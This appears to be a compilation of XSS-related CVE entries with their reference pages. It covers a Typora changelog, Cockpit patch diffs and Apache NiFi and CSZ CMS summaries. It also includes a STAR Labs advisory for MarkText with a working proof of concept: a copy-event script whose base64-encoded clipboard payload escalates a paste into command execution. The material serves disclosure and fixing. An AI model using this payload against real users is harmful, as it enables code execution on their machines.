DOM-based XSS in updater/update.html in Typora before 1.6.7 on Windows and Linux allows a crafted markdown file to run arbitrary JavaScript code in the context of Typora main window via loading typora://app/typemark/updater/update.html in <embed> tag. This vulnerability can be exploited if a user opens a malicious markdown file in Typora, or copies text from a malicious webpage and paste it into Typora.

> From this version, Windows 7, 8, 8.1 are no longer supported. For older Windows support, please check here.

**“Files” Section in Preferences Panel**

In this version, we rearranged groups in Preferences Panel, and added a new group “Files” in Preferences Panel for files related configs.

Some new options are added:

1.  Typora now allow user to set default file extensions when save file or add new file in files sidebar.
2.  Typora now allow user to config actions when drop file or folders into Typora, currently it provides following two options:
    *   Open or import the file / folder in Typora
    *   Insert a file link into Typora

**Options to Disable Auto Links**

You can now config whether Typora should auto recognize and render links from Preferences Panel → Markdown → Syntax Support.

*   When **Auto Links is disabled**, links like https://typora.io or mailto:[email protected] in the markdown document will NOT rendered as <ttps://typora.io> or \[email protected\].
    
    But you can use syntax like [title](url) or <url> to insert links.
    
*   When **Auto Links is enabled**, links like https://typora.io or mailto:[email protected] in the markdown document will rendered as <ttps://typora.io> or \[email protected\] automatically.
    

**Default Code Language**

You can now set default code language for code blocks from Preferences Panel → Code Fences.

And Typora provides some apply options:

*   Apply default code language when add code fences from menubar, context menu, or from shortcut keys.
*   Apply default code language when add code fences by input markdown syntax ```. You can press **Backspace** key or **Undo** to delete auto applied code language.
*   Apply in both cases.

Auto Apply Code Language for Code Blocks inserted from menu

Auto Apply Code Language for Code Blocks inserted from Markdown

You can also choose **Last Used** to auto apply last used code language when insert new code blocks.

**Timeline Diagram**

Typora now upgrade mermaid library to version 10, and timeline diagram is now supported.

We also added a link for diagram configurations in Preferences Panel → Markdown → Syntax Support → Diagrams.

**Other Changes****Thai Language Support**

Typora now speaks Thai, thanks to ARMnunf!

**PicList as an Image Uploader**

Typora now added PicList as an image uploader service. See here for more details.

**Other Improvements**

*   Add PEG.js syntax highlight support.

**Privacy & Security Updates**

*   Fix CVE-2023-2317
*   Fix CVE-2023-2316
*   Avoid using google font mirrors in exported HTML, now official google font CDN is used.

**Bug Fix**

*   Fix using keyword["keyword"] sometimes causes node not rendered in Mermaid diagram.
*   Fix color of typic package not readable in dark themes.
*   Fix setting inline mermaid configs may also affect other mermaid blocks.
*   Fix tasks status cannot be changed from menu bar when task list is under nested lists.
*   Fix math block is always auto numbered in exported docx and related setting is ignored.
*   \[Spec change\] Typora now allow users to escape : mark to avoid input unwanted emoji codes.

**Notice for Windows**

From this version, Windows 7, 8, 8.1 are no longer supported.

For older Windows support, please check here.

CVE-2023-2317: Typora 1.6

DOM-based XSS in src/muya/lib/contentState/pasteCtrl.js in MarkText 0.17.1 and before on Windows, Linux and macOS allows arbitrary JavaScript code to run in the context of MarkText main window. This vulnerability can be exploited if a user copies text from a malicious webpage and paste it into MarkText.

**Summary:**

There is a DOM-based XSS in MarkText allowing arbitrary JavaScript code to run in the context of MarkText main window. This vulnerability can be exploited if a user copies text from a malicious webpage and paste it into MarkText.

**Vulnerability Details:**

When the user performs paste operations, MarkText will check the clipboard data and try to convert HTML tags into the equivalent Markdown format, and then generate HTML again for markdown preview.

Specifically, when the user copies a link from a webpage and paste it into MarkText, the <a> tag will be processed by the following code in src/muya/lib/contentState/pasteCtrl.js:

const links \= Array.from(tempWrapper.querySelectorAll('a'))
for (const link of links) {
  const href \= link.getAttribute('href')
  const text \= link.textContent   // \[1\]
  if (URL\_REG.test(href) && href \=== text) {
    const title \= await getPageTitle(href)
    if (title) {
      link.innerHTML \= sanitize(title, PREVIEW\_DOMPURIFY\_CONFIG, true)
    } else {
      const span \= document.createElement('span')   // \[2\]
      span.innerHTML \= text   // \[3\]
      link.replaceWith(span)
    }
  }
}

This code iterates over all the <a> tags. For each tag, if its href attribute is the same as its textContent, MarkText will try to fetch the URL and extract title from the response, then assign to innerHTML after sanitization.

However, if the title cannot be found, MarkText will create a <span> element at [2] and assign textContent of the original <a> tag to innerHTML at [3] without any sanitization, which results in DOM-based XSS.

This should affect all platforms since MarkText is built on Electron. Tested on:

*   MarkText 0.17.1 for Windows
*   MarkText 0.17.1 for Linux

**Proof-of-Concept:**

An attacker can craft a malicious webpage and hook on the copy event with the following code:

<script\>
  document.addEventListener('copy',e\=>{
    e.preventDefault();
    let payload \= '';
    if(navigator.platform \=== 'Win32') {
      payload \= decodeURIComponent(atob('JTVCJUUyJTgwJUFBJTVEKCUzQ2ElMjBocmVmJTNEJTIyaHR0cCUzQSUyRiUyRjElM0ExJTJGJTIzJTI2JTIzeDNjJTNCc3ZnJTI2JTIzeDNlJTNCJTI2JTIzeDNjJTNCc3ZnJTI2JTIzeDIwJTNCb25sb2FkJTNEZXZhbChhdG9iKCdjbVZ4ZFdseVpTZ2lZMmhwYkdSZmNISnZZMlZ6Y3lJcExtVjRaV01vSW01dmRHVndZV1FnUXpwY1hIZHBibVJ2ZDNOY1hIZHBiaTVwYm1raUtRJTNEJTNEJykpJTI2JTIzeDNlJTNCJTIyJTNFaHR0cCUzQSUyRiUyRjElM0ExJTJGJTIzJTI2JTIzeDNjJTNCc3ZnJTI2JTIzeDNlJTNCJTI2JTIzeDNjJTNCc3ZnJTI2JTIzeDIwJTNCb25sb2FkJTNEZXZhbChhdG9iKCdjbVZ4ZFdseVpTZ2lZMmhwYkdSZmNISnZZMlZ6Y3lJcExtVjRaV01vSW01dmRHVndZV1FnUXpwY1hIZHBibVJ2ZDNOY1hIZHBiaTVwYm1raUtRJTNEJTNEJykpJTI2JTIzeDNlJTNCJTNDJTJGYSUzRSk='));
    } else {
      payload \= decodeURIComponent(atob('JTVCJUUyJTgwJUFBJTVEKCUzQ2ElMjBocmVmJTNEJTIyaHR0cCUzQSUyRiUyRjElM0ExJTJGJTIzJTI2JTIzeDNjJTNCc3ZnJTI2JTIzeDNlJTNCJTI2JTIzeDNjJTNCc3ZnJTI2JTIzeDIwJTNCb25sb2FkJTNEZXZhbChhdG9iKCdjbVZ4ZFdseVpTZ2lZMmhwYkdSZmNISnZZMlZ6Y3lJcExtVjRaV01vSW1kdWIyMWxMV05oYkdOMWJHRjBiM0lnTFdVZ0owMWhjbXRVWlhoMElGSkRSU0JRYjBNbklpayUzRCcpKSUyNiUyM3gzZSUzQiUyMiUzRWh0dHAlM0ElMkYlMkYxJTNBMSUyRiUyMyUyNiUyM3gzYyUzQnN2ZyUyNiUyM3gzZSUzQiUyNiUyM3gzYyUzQnN2ZyUyNiUyM3gyMCUzQm9ubG9hZCUzRGV2YWwoYXRvYignY21WeGRXbHlaU2dpWTJocGJHUmZjSEp2WTJWemN5SXBMbVY0WldNb0ltZHViMjFsTFdOaGJHTjFiR0YwYjNJZ0xXVWdKMDFoY210VVpYaDBJRkpEUlNCUWIwTW5JaWslM0QnKSklMjYlMjN4M2UlM0IlM0MlMkZhJTNFKQ=='))
    }
    e.clipboardData.setData('text/html', payload + window.getSelection());
  })
</script\>

The base64-encoded part in the PoC is decoded to the following content:

require("child\_process").exec("gnome-calculator -e 'MarkText RCE PoC'")

When the victim copies text from this page, the payload is added to the copied content and will be triggered when it is pasted into MarkText. This PoC will run system command notepad on Windows, or gnome-calculator on Linux.

Here are GIFs demonstrating the PoC on Windows and Ubuntu:

A live version of the PoC can be found here.

**Suggested Mitigations:**

It is recommended to sanitize untrusted data before assigning it to innerHTML.

For end users who are using the versions affected by this vulnerability, it is suggested to avoid copying text from an untrusted webpage then paste it into MarkText.

**Credits:**

Li Jiantao (@CurseRed) of STAR Labs SG Pte. Ltd. (@starlabs\_sg)

**Vulnerability Disclosure:**

As STAR Labs is a CVE Numbering Authority (CNA), the following CVE identifiers are reserved by STAR Labs to track the vulnerabilities presented in this report:

1.  **CVE-2023-2318**  
    DOM-Based Cross-site Scripting (XSS) in src/muya/lib/contentState/pasteCtrl.js in MarkText 0.17.1 allows attackers to run arbitrary JavaScript code and execute system commands by convincing the victim to copy text from a crafted webpage and paste it into MarkText.

STAR Labs requests that MarkText use the above reserved CVE identifiers when referencing the vulnerabilities presented in this report instead of requesting for new CVE identifiers (e.g. via MITRE or GitHub Security Advisory) to prevent having duplicate CVE records.

CVE-2023-2318: Security Issue: DOM-Based XSS leading to RCE · Issue #3618 · marktext/marktext

Cross-site Scripting (XSS) - Reflected in GitHub repository cockpit-hq/cockpit version 2.6.3 and prior. A patch is available at commit 2a93d391fbd2dd9e730f65d43b29beb65903d195 and anticipated to be part of version 2.6.4.

**Cockpit Cross-site Scripting vulnerability**

High severity GitHub Reviewed Published Aug 19, 2023 to the GitHub Advisory Database • Updated Aug 21, 2023

GHSA-rmgx-3w4r-xcfp: Cockpit Cross-site Scripting vulnerability

Cross-site Scripting (XSS) - Stored in GitHub repository cockpit-hq/cockpit version 2.6.3 and prior. A patch is available at commit 36d1d4d256cbbab028342ba10cc493e5c119172c and anticipated to be part of version 2.6.4.

GHSA-ff45-2jp9-69jc: Cockpit Cross-site Scripting vulnerability

Cross-site Scripting (XSS) - Reflected in GitHub repository cockpit-hq/cockpit prior to 2.6.4.

Expand Up

@@ -5,7 +5,7 @@

</head\>

<body\>

<rapi-doc

spec-url\="<?=$openApiUrl?>"

spec-url\="<?=$this\->escape($openApiUrl)?>"

show-header\="false"

show-info\="false"

render-style\="read"

Expand All

@@ -14,12 +14,12 @@

<?php if($apiKey): ?>

api-key-name = "api-key"

api-key-location = "header"

api-key-value = "<?=$apiKey?>"

api-key-value = "<?=$this\->escape($apiKey)?>"

<?php endif ?>

  

bg-color\="<?=($bgColor ? $bgColor : '#10131a')?>"

text-color\="<?=($textColor ? $textColor : '#fafafa')?>"

primary-color\="<?=($primaryColor ? $primaryColor : '#0e8fff')?>"

bg-color\="<?=$this\->escape($bgColor ? $bgColor : '#10131a')?>"

text-color\="<?= $this\->escape($textColor ? $textColor : '#fafafa')?>"

primary-color\="<?= $this\->escape($primaryColor ? $primaryColor : '#0e8fff')?>"

\></rapi-doc\>

  

<script type\="module" src\="<?=$this\->base('system:assets/vendor/rapidoc.js')?>"\></script\>

Expand Down

CVE-2023-4432: Fix possible Cross-site Scripting (XSS) in Rest/GraphQL viewer · Cockpit-HQ/Cockpit@2a93d39

Cross-site Scripting (XSS) - Stored in GitHub repository cockpit-hq/cockpit prior to 2.6.4.

CVE-2023-4433

Apache NiFi 1.21.0 through 1.23.0 support JDBC and JNDI JMS access in several Processors and Controller Services with connection URL validation that does not provide sufficient protection against crafted inputs. An authenticated and authorized user can bypass connection URL validation using custom input formatting. The resolution enhances connection URL validation and introduces validation for additional related properties. Upgrading to Apache NiFi 1.23.1 is the recommended mitigation.


CVE-2023-40037: Apache NiFi Security Reports

Cross-site Scripting (XSS) - Stored in GitHub repository cockpit-hq/cockpit prior to 2.6.3.

**Cockpit Cross-site Scripting vulnerability**

Moderate severity GitHub Reviewed Published Aug 18, 2023 to the GitHub Advisory Database • Updated Aug 18, 2023

GHSA-8m65-qq6g-43rr: Cockpit Cross-site Scripting vulnerability

Expand Up @@ -58,16 +58,18 @@ $files = $param; }  
$finfo = finfo\_open(FILEINFO\_MIME\_TYPE); $uploaded = \[\]; $failed = \[\]; $\_files = \[\]; $\_files \= \[\]; $assets = \[\];  
$allowed = $this\->app\->retrieve('assets/allowed\_uploads', '\*'); $allowed = $allowed == '\*' ? true : str\_replace(\[' ', ','\], \['', '|'\], preg\_quote(is\_array($allowed) ? implode(',', $allowed) : $allowed)); $max\_size = $this\->app\->retrieve('assets/max\_upload\_size', 0);  
$forbidden = \['php', 'phar', 'phtml', 'phps', 'htm', 'html', 'htaccess'\]; $forbiddenExtension = \['php', 'phar', 'phtml', 'phps', 'htm', 'html', 'htaccess'\]; $forbiddenMime = \['application/x-httpd-php', 'text/html'\];  
if (isset($files\['name'\]) && is\_array($files\['name'\])) {  
Expand All @@ -76,11 +78,15 @@ for ($i = 0; $i < $cnt; $i++) {  
$\_file = $this\->app\->path('#tmp:').'/'.$files\['name'\]\[$i\]; $\_mime = finfo\_file($finfo, $\_file); $\_isAllowed = $allowed === true ? true : preg\_match("/\\.({$allowed})$/i", $\_file); $\_sizeAllowed = $max\_size ? filesize($files\['tmp\_name'\]\[$i\]) < $max\_size : true;  
// prevent uploading php files if ($\_isAllowed && in\_array(strtolower(pathinfo($\_file, PATHINFO\_EXTENSION)), $forbidden)) { // prevent uploading php / html files if ($\_isAllowed && ( in\_array(strtolower(pathinfo($\_file, PATHINFO\_EXTENSION)), $forbiddenExtension) || in\_array(strtolower($\_mime), $forbiddenMime) )) { $\_isAllowed = false; }  
Expand Down

CVE-2023-4422: make assets uploading more secure · Cockpit-HQ/Cockpit@b8dad5e

CSZ CMS 1.3.0 is vulnerable to cross-site scripting (XSS), which allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered in the 'Carousel Wiget' section and choosing our carousel widget created above, in 'Photo URL' and 'YouTube URL' plugin.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

Tag

#xss